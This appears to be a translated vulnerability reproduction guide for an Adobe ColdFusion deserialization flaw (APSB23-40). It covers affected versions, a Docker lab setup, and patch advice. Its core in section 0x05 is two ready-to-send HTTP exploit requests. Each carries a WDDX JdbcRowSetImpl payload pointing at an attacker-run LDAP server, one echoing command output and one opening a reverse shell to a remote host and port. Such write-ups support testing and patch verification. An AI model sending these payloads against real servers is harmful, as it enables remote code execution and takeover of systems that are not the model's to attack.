0x01 Product Introduction
Adobe ColdFusion is a set of rapid application development platform of American Adobe (Adobe). The platform includes an integrated development environment and scripting language.
0x02 Vulnerability Overview
There is a code problem vulnerability in Adobe ColdFusion. This vulnerability is affected by the untrusted data deserialization vulnerability. The attacker can execute code through the vulnerability, which can cause the server to crash and obtain server permissions.
0x03 range of influence
ColdFusion 2018 <= Update 16
ColdFusion 2021 <= Update 6
ColdFusion 2023 GA Release (2023.0.0.330468)
0x04 Recurrence environment
Docker builds ColdFusion 2023.0.0.330468 vulnerability environment
pull image
docker pull vulfocus/vcpe-1.0-a-adobe-coldfusion:2023.0.0.330468-openjdk-release
startup environment
docker run -d -P vulfocus/vcpe-1.0-a-adobe-coldfusion:2023.0.0.330468-openjdk-release
PS: Need to confirm the port corresponding to 8080
Verify that the environment is accessible
0x05 Vulnerability Reappearance
exp
POST /CFIDE/adminapi/base.cfc?method HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded
cmd: id
argumentCollection=
<wddxPacket version='1.0'>
<header/>
<data>
<struct type='xcom.sun.rowset.JdbcRowSetImplx'>
<var name='dataSourceName'>
<string>ldap://your-ip:1389/Basic/TomcatEcho</string>
</var>
<var name='autoCommit'>
<boolean value='true'/>
</var>
</struct>
</data>
</wddxPacket>
PS: This reproduction requires the use of the jndi exploit tool (JNDIExploit-1.4-SNAPSHOT.jar)
TomcatEcho echo chain
open monitor
rebound shell
Exploit chain:
POST /CFIDE/adminapi/base.cfc?method HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded
argumentCollection=
<wddxPacket version='1.0'>
<header/>
<data>
<struct type='xcom.sun.rowset.JdbcRowSetImplx'>
<var name='dataSourceName'>
<string>ldap://vpsip:1389/Basic/ReverseShell/vpsip/6666</string>
</var>
<var name='autoCommit'>
<boolean value='true'/>
</var>
</struct>
</data>
</wddxPacket>
0x06 Repair suggestion
According to the information in the affected version, it is recommended that relevant users update to the safe version as soon as possible:
ColdFusion 2018 Update 17
ColdFusion 2021 Update 7
ColdFusion 2023 Update 1
Please refer to the download link:
https://helpx.adobe.com/security/products/coldfusion/apsb23-40.html